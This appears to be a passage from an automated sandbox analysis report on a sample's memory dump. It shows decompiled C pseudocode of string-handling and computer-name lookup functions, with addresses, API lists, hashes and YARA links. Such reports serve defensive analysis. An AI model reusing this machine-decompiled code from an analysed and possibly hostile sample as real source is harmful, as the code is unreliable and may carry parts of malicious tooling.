												 *((intOrPtr*)(_t52 + 0x10)) = _v12;
												 *((intOrPtr*)(_t52 + 0x14)) = _v172;
												_t79 = _v20;
												 *_t52 = 0x20;
												 *(_t52 + 4) = _t64;
												 *((intOrPtr*)(_t52 + 0x18)) = _v24;
												 *((intOrPtr*)(_t52 + 0x1c)) = _v20;
											}
											_t53 = _v44;
											if(_v44 != 0) {
												E0042BE8C(_t53);
											}
											_t49 = 0;
											goto L21;
										} else {
											_t73 = _v252;
											if(_t73 == 0) {
												goto L12;
											} else {
												_t58 = _v32;
												_push(0);
												_push(1);
												_t74 = _t73 + _t58;
												_push(_t58);
												_v12 = _t74;
												if( *_t74() != 0) {
													goto L12;
												} else {
													_pop(_t87);
													return E0042A36A(0xa, _t64, _v8 ^ _t88, _t79, _t82, _t87);
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					return E0042A36A(0xfffffffe, _t64, _v8 ^ _t88, __edx, _t82, __esi);
				}
			}

0x004040d0
0x004040d9
0x004040e0
0x004040e7
0x004040eb
0x004040ee
0x004040f8
0x0040410f
0x00404112
0x00404118
0x0040411b
0x0040411e
0x00404121
0x00404124
0x00404127
0x0040412c
0x00404131
0x00404241
0x00404244
0x00404251
0x00404137
0x0040413a
0x00404141
0x00000000
0x00404147
0x00404147
0x0040414d
0x0040414f
0x00404154
0x00404159
0x00000000
0x0040415f
0x0040415f
0x00404162
0x00404167
0x0040416c
0x00000000
0x0040417f
0x0040417f
0x00404186
0x00000000
0x0040418c
0x0040418c
0x00404192
0x004041c7
0x004041c7
0x004041cf
0x00404207
0x00404209
0x0040420e
0x00404210
0x00404217
0x0040421d
0x0040421e
0x00404210
0x00404223
0x00404227
0x0040422c
0x0040422c
0x004041d1
0x004041d7
0x004041dd
0x004041e6
0x004041ec
0x004041ef
0x004041f2
0x004041f8
0x004041fb
0x004041fe
0x004041fe
0x0040422f
0x00404234
0x00404237
0x0040423c
0x0040423f
0x00000000
0x00404194
0x00404194
0x0040419c
0x00000000
0x0040419e
0x0040419e
0x004041a1
0x004041a3
0x004041a5
0x004041a7
0x004041a8
0x004041af
0x00000000
0x004041b1
0x004041b1
0x004041c6
0x004041c6
0x004041af
0x0040419c
0x00404192
0x00404186
0x0040416c
0x00404159
0x00404141
0x004040fb
0x0040410e
0x0040410e

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee9d5bd7cec5cdaeb3f57344b01d74654dbfd31ae1bb062d1dc3cf8d75862fc1
Instruction ID: a1bd3b3e43050a4ca894acc056e025a006113759f46b14af07cb037f9304cd27
Opcode Fuzzy Hash: ee9d5bd7cec5cdaeb3f57344b01d74654dbfd31ae1bb062d1dc3cf8d75862fc1
Instruction Fuzzy Hash: 12415EB1F002199BCB14DFA5D945AAFB7B4EF94354F0040BEE909A7391E738D940CB95

Uniqueness

Uniqueness Score: -1.00%

Function 00421EE0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00421EE0(intOrPtr* __ecx, long long _a4) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				signed int _v32;
				char _v36;
				intOrPtr* _v40;
				signed int _v44;
				intOrPtr* _v48;
				char _v56;
				signed int _t64;
				signed int _t68;
				signed int _t77;
				char _t79;
				intOrPtr* _t80;
				signed int _t86;
				signed int _t97;
				intOrPtr* _t101;
				signed int _t104;
				void* _t107;
				intOrPtr* _t108;
				intOrPtr _t114;
				intOrPtr _t115;
				signed int _t123;
				signed int _t139;
				intOrPtr* _t141;
				signed int _t143;
				void* _t144;
				intOrPtr _t145;
				void* _t146;
				signed int _t161;

				_push(0xffffffff);
				_push(E0043F830);
				_push( *[fs:0x0]);
				_t145 = _t144 - 0x28;
				_t64 =  *0x451f00; // 0xc21d6f0a
				_push(_t64 ^ _t143);
				 *[fs:0x0] =  &_v16;
				_v20 = _t145;
				_t141 = __ecx;
				_v24 = __ecx;
				_t101 =  *((intOrPtr*)( *((intOrPtr*)( *__ecx + 4)) + __ecx + 0x38));
				_v28 = 0;
				_v48 = __ecx;
				if(_t101 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 4))))();
				}
				_t68 =  *( *_t141 + 4);
				_v8 = 0;
				if( *((intOrPtr*)(_t68 + _t141 + 0xc)) == 0) {
					_t91 =  *((intOrPtr*)(_t68 + _t141 + 0x3c));
					if( *((intOrPtr*)(_t68 + _t141 + 0x3c)) != 0) {
						E00418DB0(_t91);
					}
				}
				_t69 =  *_t141;
				_t104 =  *( *_t141 + 4) & 0xffffff00 |  *((intOrPtr*)( *( *_t141 + 4) + _t141 + 0xc)) == 0x00000000;
				_v44 = _t104;
				_v8 = 1;
				if(_t104 != 0) {
					_t79 = E00414D10( *((intOrPtr*)(_t69 + 4)) + _t141,  &_v32);
					_v8 = 2;
					_t80 = E00421830(_t79);
					_t97 = _v32;
					_t146 = _t145 + 4;
					_v40 = _t80;
					_v8 = 1;
					if(_t97 != 0) {
						E00429A1B( &_v36, 0);
						_t86 =  *(_t97 + 4);
						if(_t86 > 0 && _t86 < 0xffffffff) {
							 *(_t97 + 4) = _t86 - 1;
						}
						asm("sbb edi, edi");
						E00429A43( &_v36);
						_t139 =  !( ~( *(_t97 + 4))) & _t97;
						if(_t139 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t139))))(1);
						}
					}
					_t114 =  *_t141;
					_t115 =  *((intOrPtr*)(_t114 + 4));
					 *((long long*)(_t146 - 8)) = _a4;
					_v36 =  *((intOrPtr*)(_t115 + _t141 + 0x40));
					_v56 = 0;
					_v8 = 3;
					 *((intOrPtr*)( *((intOrPtr*)( *_v40 + 0xc))))( &_v56, _v56,  *((intOrPtr*)(_t115 + _t141 + 0x38)),  *((intOrPtr*)(_t114 + 4)) + _t141, _v36); // executed
					if(_v56 != 0) {
						_v28 = 4;
					}
					_v8 = 1;
				}
				_t53 =  &_v28; // 0x423def
				_t123 =  *_t53;
				_t107 =  *( *_t141 + 4) + _t141;
				if(_t123 != 0) {
					_t77 =  *(_t107 + 0xc) | _t123;
					if( *((intOrPtr*)(_t107 + 0x38)) == 0) {
						_t161 = _t77;
					}
					E00418030(_t107, _t77, 0);
				}
				_v8 = 5;
				if(L0042A194(_t161) == 0) {
					E00421770();
				}
				_t108 =  *((intOrPtr*)( *( *_t141 + 4) + _t141 + 0x38));
				_v8 = 0xffffffff;
				if(_t108 != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 8))))();
				}
				 *[fs:0x0] = _v16;
				return _t141;
			}

0x00421ee3
0x00421ee5
0x00421ef0
0x00421ef1
0x00421ef7
0x00421efe
0x00421f02
0x00421f08
0x00421f0b
0x00421f0d
0x00421f15
0x00421f1b
0x00421f1e
0x00421f23
0x00421f2a
0x00421f2a
0x00421f2e
0x00421f31
0x00421f38
0x00421f3a
0x00421f40
0x00421f44
0x00421f44
0x00421f40
0x00421f49
0x00421f52
0x00421f55
0x00421f58
0x00421f61
0x00421f70
0x00421f76
0x00421f7a
0x00421f7f
0x00421f82
0x00421f85
0x00421f88
0x00421f8e
0x00421f94
0x00421f99
0x00421f9e
0x00421fa6
0x00421fa6
0x00421fae
0x00421fb5
0x00421fba
0x00421fbc
0x00421fc6
0x00421fc6
0x00421fbc
0x00421fc8
0x00421fd0
0x00421fde
0x00421fe1
0x00421ff1
0x00422002
0x00422006
0x0042200c
0x0042200e
0x0042200e
0x00422015
0x00422015
0x00422021
0x00422021
0x00422024
0x00422028
0x0042202d
0x00422033
0x00422035
0x00422035
0x0042203b
0x0042203b
0x00422040
0x0042204e
0x00422052
0x00422052
0x0042205c
0x00422060
0x00422069
0x00422070
0x00422070
0x00422077
0x00422085

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00421F94

Strings

=B, xrefs: 00422021

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: LockitLockit::_std::_
String ID: =B
API String ID: 3382485803-369884318
Opcode ID: 0f065bfea39229229cd5eaeb29be43d2bc54a4d99ba184aa3af539c9b7a30775
Instruction ID: 3b55853ffe591e05f9788f3393dab8d773b45fc390218f3d0b27330556724ea0
Opcode Fuzzy Hash: 0f065bfea39229229cd5eaeb29be43d2bc54a4d99ba184aa3af539c9b7a30775
Instruction Fuzzy Hash: 3251A074B00214DFCB14CF58DA80AAEBBB5BF98318F64815EE5059B391C77AED01CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00404BC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BC0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t15;
				intOrPtr* _t16;
				char* _t22;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t47;
				intOrPtr* _t52;

				_t33 = _a4;
				_t52 = __ecx;
				if(_t33 == 0) {
					L12:
					_t47 = _a8;
					if(_t47 > 0xfffffffe) {
						E00429799("string too long");
					}
					_t15 =  *((intOrPtr*)(_t52 + 0x14));
					if(_t15 >= _t47) {
						if(_t47 != 0) {
							goto L16;
						} else {
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if(_t15 < 0x10) {
								_t22 = _t52;
								 *_t22 = 0;
								return _t22;
							} else {
								 *((char*)( *_t52)) = 0;
								return _t52;
							}
						}
					} else {
						E004044F0(_t52, _t47,  *((intOrPtr*)(_t52 + 0x10))); // executed
						if(_t47 == 0) {
							L26:
							return _t52;
						} else {
							L16:
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								_t16 = _t52;
							} else {
								_t16 =  *_t52;
							}
							E0042B8D0(_t16, _t33, _t47);
							 *((intOrPtr*)(_t52 + 0x10)) = _t47;
							if( *((intOrPtr*)(_t52 + 0x14)) < 0x10) {
								 *((char*)(_t52 + _t47)) = 0;
								goto L26;
							} else {
								 *((char*)( *_t52 + _t47)) = 0;
								return _t52;
							}
						}
					}
				} else {
					_t38 =  *((intOrPtr*)(__ecx + 0x14));
					if(_t38 < 0x10) {
						_t27 = __ecx;
					} else {
						_t27 =  *__ecx;
					}
					if(_t33 < _t27) {
						goto L12;
					} else {
						if(_t38 < 0x10) {
							_t28 = _t52;
						} else {
							_t28 =  *_t52;
						}
						if( *((intOrPtr*)(_t52 + 0x10)) + _t28 <= _t33) {
							goto L12;
						} else {
							if(_t38 < 0x10) {
								return E00404AD0(_t52, _t52, _t33 - _t52, _a8);
							} else {
								return E00404AD0(_t52, _t52, _t33 -  *_t52, _a8);
							}
						}
					}
				}
			}

0x00404bc4
0x00404bc8
0x00404bcc
0x00404c27
0x00404c28
0x00404c2e
0x00404c35
0x00404c35
0x00404c3a
0x00404c3f
0x00404c5d
0x00000000
0x00404c5f
0x00404c5f
0x00404c65
0x00404c76
0x00404c79
0x00404c7e
0x00404c67
0x00404c6a
0x00404c72
0x00404c72
0x00404c65
0x00404c41
0x00404c48
0x00404c4f
0x00404cac
0x00404cb2
0x00404c51
0x00404c51
0x00404c55
0x00404c81
0x00404c57
0x00404c57
0x00404c57
0x00404c86
0x00404c92
0x00404c95
0x00404ca8
0x00000000
0x00404c97
0x00404c99
0x00404ca3
0x00404ca3
0x00404c95
0x00404c4f
0x00404bce
0x00404bce
0x00404bd4
0x00404bda
0x00404bd6
0x00404bd6
0x00404bd6
0x00404bde
0x00000000
0x00404be0
0x00404be3
0x00404be9
0x00404be5
0x00404be5
0x00404be5
0x00404bf2
0x00000000
0x00404bf4
0x00404bf7
0x00404c24
0x00404bf9
0x00404c0d
0x00404c0d
0x00404bf7
0x00404bf2
0x00404bde

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404C35

Part of subcall function 00404AD0: std::_Xinvalid_argument.LIBCPMT ref: 00404AEA

Strings

string too long, xrefs: 00404C30

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: e5ef032750774899b28bbc7792aa571b5148cb660e651cfa8f7beb6d0d20a71b
Instruction ID: d4f2a4f182ba394c78813d04d0d1012a0fa0ecec8fe0564bde6478ce2cf51078
Opcode Fuzzy Hash: e5ef032750774899b28bbc7792aa571b5148cb660e651cfa8f7beb6d0d20a71b
Instruction Fuzzy Hash: 5431F9B23056109BE7249D5DA88092AF7E9EBE1724B20093FF652D77C0C779EC4083A8

Uniqueness

Uniqueness Score: -1.00%

Function 00417D30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00417D30(void* __ecx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				void* __esi;
				void* _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				void* _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				char _t34;

				_v8 = E0042C541(_t28, __edi, _t33, __eflags, 0x20, _t33);
				_t8 = E004042A0(_a4, _a8, 0, _t6); // executed
				if(_t8 == 0) {
					_t34 = _v8;
					__eflags = _t34;
					if(_t34 == 0) {
						goto L2;
					} else {
						_t10 =  *0x4533e0; // 0x25c7168
						_t11 = E00404370(_t34, _t10);
						_t25 =  *0x4537b0; // 0x25c9288
						 *0x453d68 = _t11;
						_t12 = E00404370(_t34, _t25);
						_t29 =  *0x453a40; // 0x25c91e0
						 *0x453d84 = _t12;
						 *0x453dc0 = E00404370(_t34, _t29);
						_t14 =  *0x453784; // 0x25c7408
						_t15 = E00404370(_t34, _t14);
						_t26 =  *0x453aac; // 0x25c7288
						 *0x453da8 = _t15;
						_t16 = E00404370(_t34, _t26);
						_t30 =  *0x453844; // 0x25c92a0
						 *0x453d98 = _t16;
						 *0x453dbc = E00404370(_t34, _t30);
						_t18 =  *0x453910; // 0x25c7228
						_t19 = E00404370(_t34, _t18);
						_t27 =  *0x4537c4; // 0x25c7208
						 *0x453d90 = _t19;
						 *0x453d88 = E00404370(_t34, _t27);
						return 1;
					}
				} else {
					E0042A2F0( &_v8, 0, 4);
					L2:
					return 0;
				}
			}

0x00417d40
0x00417d4a
0x00417d54
0x00417d6d
0x00417d70
0x00417d72
0x00000000
0x00417d74
0x00417d74
0x00417d7b
0x00417d80
0x00417d88
0x00417d8d
0x00417d92
0x00417d9a
0x00417da4
0x00417da9
0x00417db0
0x00417db5
0x00417dbd
0x00417dc2
0x00417dc7
0x00417dcf
0x00417dd9
0x00417dde
0x00417de5
0x00417dea
0x00417df2
0x00417dff
0x00417e0d
0x00417e0d
0x00417d56
0x00417d5e
0x00417d66
0x00417d6c
0x00417d6c

APIs

Part of subcall function 0042C541: _malloc.LIBCMT ref: 0042C55B

_memset.LIBCMT ref: 00417D5E

Strings

ZHaZea, xrefs: 00417D9A

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: _malloc_memset
String ID: ZHaZea
API String ID: 4137368368-655617003
Opcode ID: 7a7306b26129db9caac01de8383b12c141a849b2f9949eff1ea199ff95969061
Instruction ID: ad58b752cf80e32b9d44d7f0c8c58c09a6aecac01ffd8f07f4db25fe24113a2d
Opcode Fuzzy Hash: 7a7306b26129db9caac01de8383b12c141a849b2f9949eff1ea199ff95969061
Instruction Fuzzy Hash: C52131F1A113146BD714EF65FC42E6B77BCEB85786F00416EBA0497252E674DE0087A8

Uniqueness

Uniqueness Score: -1.00%

Function 00404660 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00404660(intOrPtr* __ecx, void* __edi, intOrPtr _a4, char _a8) {
				signed int _t11;
				signed int _t16;
				intOrPtr _t19;
				intOrPtr _t20;
				void* _t25;
				intOrPtr _t26;
				intOrPtr* _t28;
				void* _t29;

				_t25 = __edi;
				_t21 = __ecx;
				_t19 = _a4;
				_t28 = __ecx;
				if(_t19 > 0xfffffffe) {
					E00429799("string too long");
				}
				_t11 =  *(_t28 + 0x14);
				if(_t11 >= _t19) {
					if(_a8 == 0 || _t19 >= 0x10) {
						if(_t19 == 0) {
							 *((intOrPtr*)(_t28 + 0x10)) = _t19;
							if(_t11 >= 0x10) {
								_t28 =  *_t28;
							}
							 *_t28 = 0;
						}
						asm("sbb eax, eax");
						return  ~_t11;
					} else {
						_push(_t25);
						_t26 =  *((intOrPtr*)(_t28 + 0x10));
						if(_t19 < _t26) {
							_t26 = _t19;
						}
						if(_t11 >= 0x10) {
							_t20 =  *_t28;
							if(_t26 != 0) {
								E0042B8D0(_t28, _t20, _t26);
								_t29 = _t29 + 0xc;
							}
							_push(_t20);
							_t11 = E0042A289();
							_t19 = _a4;
						}
						 *((intOrPtr*)(_t28 + 0x10)) = _t26;
						 *(_t28 + 0x14) = 0xf;
						 *((char*)(_t26 + _t28)) = 0;
						asm("sbb eax, eax");
						return  ~_t11;
					}
				} else {
					_t16 = E004044F0(_t21, _t19,  *((intOrPtr*)(_t28 + 0x10))); // executed
					asm("sbb eax, eax");
					return  ~_t16;
				}
			}

0x00404660
0x00404660
0x00404664
0x00404668
0x0040466d
0x00404674
0x00404674
0x00404679
0x0040467e
0x0040469c
0x004046ee
0x004046f0
0x004046f6
0x004046f8
0x004046f8
0x004046fa
0x004046fa
0x00404701
0x00404708
0x004046a3
0x004046a3
0x004046a4
0x004046a9
0x004046ab
0x004046ab
0x004046b0
0x004046b2
0x004046b6
0x004046bb
0x004046c0
0x004046c0
0x004046c3
0x004046c4
0x004046c9
0x004046cc
0x004046cf
0x004046d2
0x004046db
0x004046e2
0x004046e9
0x004046e9
0x00404680
0x00404685
0x0040468e
0x00404695
0x00404695

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00404674

Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297AE
Part of subcall function 00429799: __CxxThrowException@8.LIBCMT ref: 004297C3
Part of subcall function 00429799: std::exception::exception.LIBCMT ref: 004297D4

Strings

string too long, xrefs: 0040466F

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: string too long
API String ID: 1823113695-2556327735
Opcode ID: 6633c877a37cbeb57af4da491370de19485a4b6dd0739996acf5e80301f590a4
Instruction ID: 2053a2a3227c467e96d836e7069f63e6baff1562ac012ed16f9a192c21e4f87f
Opcode Fuzzy Hash: 6633c877a37cbeb57af4da491370de19485a4b6dd0739996acf5e80301f590a4
Instruction Fuzzy Hash: 5E11ECB11143105FF7249D79A8C1A2FB798AB92718F100E3FE597932C2E77EA8444369

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC70 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0041EC70(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi) {
				signed int _v8;
				char _v32776;
				long _v32780;
				signed int _t9;
				int _t12;
				char* _t13;
				intOrPtr _t15;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr _t21;
				signed int _t22;

				_t21 = __esi;
				_t20 = __edi;
				_t19 = __edx;
				_t15 = __ebx;
				E0042BC40(0x8008);
				_t9 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t9 ^ _t22;
				_v32780 = 0x7fff;
				_t12 = GetComputerNameA( &_v32776,  &_v32780); // executed
				_t13 = "Unknown";
				if(_t12 != 0) {
					_t13 =  &_v32776;
				}
				return E0042A36A(_t13, _t15, _v8 ^ _t22, _t19, _t20, _t21);
			}

0x0041ec70
0x0041ec70
0x0041ec70
0x0041ec70
0x0041ec78
0x0041ec7d
0x0041ec84
0x0041ec95
0x0041ec9f
0x0041eca7
0x0041ecac
0x0041ecae
0x0041ecae
0x0041ecc1

APIs

GetComputerNameA.KERNEL32 ref: 0041EC9F

Strings

Unknown, xrefs: 0041ECA7

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: ComputerName
String ID: Unknown
API String ID: 3545744682-1654365787
Opcode ID: e9a27ad8f5ede74b0b414f5162ec3b8936d2dcd518a56fbf986275c7ba85a412
Instruction ID: 0af2135f3043c94dcdcb214d3f2dd1d5c97522f9647718272359f0d5f317b6bd
Opcode Fuzzy Hash: e9a27ad8f5ede74b0b414f5162ec3b8936d2dcd518a56fbf986275c7ba85a412
Instruction Fuzzy Hash: 14E0C075A0411C8BCB94DB99DD4569AB7F8FB08704F4081BAA94993241EF34AA8C8F5D

Uniqueness

Uniqueness Score: -1.00%

Function 004044F0 Relevance: 3.1, APIs: 2, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E004044F0(intOrPtr* __ecx, signed int _a4, intOrPtr _a8) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				char _v28;
				signed int _v32;
				char _v44;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t38;
				signed int _t41;
				signed int _t42;
				intOrPtr* _t44;
				unsigned int _t56;
				intOrPtr _t57;
				unsigned int _t61;
				void* _t62;
				intOrPtr* _t74;
				signed int _t78;
				signed int _t83;
				intOrPtr _t84;

				_push(0xffffffff);
				_push(E0043DEE0);
				_push( *[fs:0x0]);
				_t84 = _t83 - 0x1c;
				_t35 =  *0x451f00; // 0xc21d6f0a
				_push(_t35 ^ _t83);
				 *[fs:0x0] =  &_v16;
				_v20 = _t84;
				_t74 = __ecx;
				_v24 = __ecx;
				_t38 = _a4;
				_t78 = _t38 | 0x0000000f;
				if(_t78 <= 0xfffffffe) {
					_t56 =  *(__ecx + 0x14);
					_t61 = _t56 >> 1;
					_t70 = 0xaaaaaaab * _t78 >> 0x20 >> 1;
					__eflags = _t61 - 0xaaaaaaab * _t78 >> 0x20 >> 1;
					if(__eflags > 0) {
						_t78 = _t61 + _t56;
						__eflags = _t56 - 0xfffffffe - _t61;
						if(__eflags > 0) {
							_t78 = 0xfffffffe;
						}
					}
				} else {
					_t78 = _t38;
				}
				_t41 = 0;
				_t11 = _t78 + 1; // 0xffffffff
				_t62 = _t11;
				_v8 = 0;
				if(_t62 <= 0) {
					L8:
					_a4 = _t41;
					_t57 = _a8;
					if(_t57 != 0) {
						if( *(_t74 + 0x14) < 0x10) {
							_t44 = _t74;
						} else {
							_t44 =  *_t74;
						}
						E0042B8D0(_a4, _t44, _t57);
						_t84 = _t84 + 0xc;
					}
					if( *(_t74 + 0x14) >= 0x10) {
						_push( *_t74);
						E0042A289();
					}
					_t42 = _a4;
					 *_t74 = 0;
					 *_t74 = _t42;
					 *(_t74 + 0x14) = _t78;
					 *((intOrPtr*)(_t74 + 0x10)) = _t57;
					if(_t78 >= 0x10) {
						_t74 = _t42;
					}
					 *((char*)(_t74 + _t57)) = 0;
					 *[fs:0x0] = _v16;
					return _t42;
				} else {
					_t89 = _t62 - 0xffffffff;
					if(_t62 > 0xffffffff) {
						L9:
						_v28 = 0;
						E0042BF4E( &_v44,  &_v28);
						_v44 = 0x443c14;
						E0042C5C1( &_v44, 0x44b220);
						_v32 = _a4;
						_v20 = _t84;
						__eflags = _v24 + 0x18;
						_v8 = 2;
						_a4 = E004044A0(_t74, _t78, _a4 + 1);
						return E004045C6;
					} else {
						_push(_t62); // executed
						_t41 = E0042C541(_t70, _t74, _t78, _t89); // executed
						_t84 = _t84 + 4;
						if(0 == 0) {
							goto L9;
						} else {
							goto L8;
						}
					}
				}
			}

0x004044f3
0x004044f5
0x00404500
0x00404501
0x00404507
0x0040450e
0x00404512
0x00404518
0x0040451b
0x0040451d
0x00404520
0x00404525
0x0040452b
0x00404531
0x0040453d
0x0040453f
0x00404541
0x00404543
0x0040454c
0x0040454f
0x00404551
0x00404553
0x00404553
0x00404551
0x0040452d
0x0040452d
0x0040452d
0x00404558
0x0040455a
0x0040455a
0x0040455d
0x00404562
0x00404576
0x00404576
0x004045cc
0x004045d1
0x004045d7
0x004045dd
0x004045d9
0x004045d9
0x004045d9
0x004045e5
0x004045ea
0x004045ea
0x004045f1
0x004045f5
0x004045f6
0x004045fb
0x004045fe
0x00404601
0x00404604
0x00404606
0x00404609
0x0040460f
0x00404611
0x00404611
0x00404613
0x0040461a
0x00404628
0x00404564
0x00404564
0x00404567
0x0040457b
0x00404582
0x00404589
0x00404597
0x0040459e
0x004045a9
0x004045ad
0x004045b1
0x004045b4
0x004045bd
0x004045c5
0x00404569
0x00404569
0x0040456a
0x0040456f
0x00404574
0x00000000
0x00000000
0x00000000
0x00000000
0x00404574
0x00404567

APIs

std::exception::exception.LIBCMT ref: 00404589

Part of subcall function 0042BF4E: std::exception::_Copy_str.LIBCMT ref: 0042BF69

__CxxThrowException@8.LIBCMT ref: 0040459E

Part of subcall function 0042C5C1: RaiseException.KERNEL32(?,?,0042C5C0,?,?,?,?,?,0042C5C0,?,0044B220,00464BA8), ref: 0042C603

Part of subcall function 004044A0: std::exception::exception.LIBCMT ref: 004044CF
Part of subcall function 004044A0: __CxxThrowException@8.LIBCMT ref: 004044E4

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_
String ID:
API String ID: 1430062303-0
Opcode ID: 94becfbc0cefeea02aa89a7349c63c482d1656dc1909e5e9d2c7ebb4815dc416
Instruction ID: 48a265945ccbb30af835310dfdf644b0553f15d8645517d2ed0fc038568f1c27
Opcode Fuzzy Hash: 94becfbc0cefeea02aa89a7349c63c482d1656dc1909e5e9d2c7ebb4815dc416
Instruction Fuzzy Hash: 8041EBB1D00215ABCB14DF68D88169EBBF4EB45324F50423BEA26A73C0D778D940CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 0040D100 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040D100(void* __eflags, signed int _a4, intOrPtr* _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				void* __ecx;
				void* __edi;
				signed int _t19;
				void* _t25;
				void* _t30;
				signed int _t31;
				intOrPtr _t44;
				signed int _t47;
				signed int _t49;

				_push(0xffffffff);
				_push(E0043E149);
				_push( *[fs:0x0]);
				_t19 =  *0x451f00; // 0xc21d6f0a
				_push(_t19 ^ _t49);
				 *[fs:0x0] =  &_v16;
				_v20 = 0;
				_t47 = _a4;
				 *((intOrPtr*)(_t47 + 0x14)) = 0xf;
				 *((intOrPtr*)(_t47 + 0x10)) = 0;
				 *_t47 = 0;
				_t33 = _a12;
				_v8 = 0;
				_v20 = 1;
				_t25 = E0042BC70(_a12) +  *((intOrPtr*)(_a8 + 0x10));
				_t44 =  *((intOrPtr*)(_t47 + 0x10));
				if(_t44 <= _t25 &&  *((intOrPtr*)(_t47 + 0x14)) != _t25) {
					_t30 = E00404660(_t47, _t44, _t25, 1); // executed
					if(_t30 != 0) {
						 *((intOrPtr*)(_t47 + 0x10)) = _t44;
						if( *((intOrPtr*)(_t47 + 0x14)) < 0x10) {
							_t31 = _t47;
						} else {
							_t31 =  *_t47;
						}
						 *((char*)(_t31 + _t44)) = 0;
					}
				}
				E00404710(_t47, _a8, 0, 0xffffffff);
				E0040A4B0(_t47, _t33, E0042BC70(_t33));
				 *[fs:0x0] = _v16;
				return _t47;
			}

0x0040d103
0x0040d105
0x0040d110
0x0040d115
0x0040d11c
0x0040d120
0x0040d128
0x0040d12b
0x0040d12e
0x0040d135
0x0040d138
0x0040d13a
0x0040d13d
0x0040d147
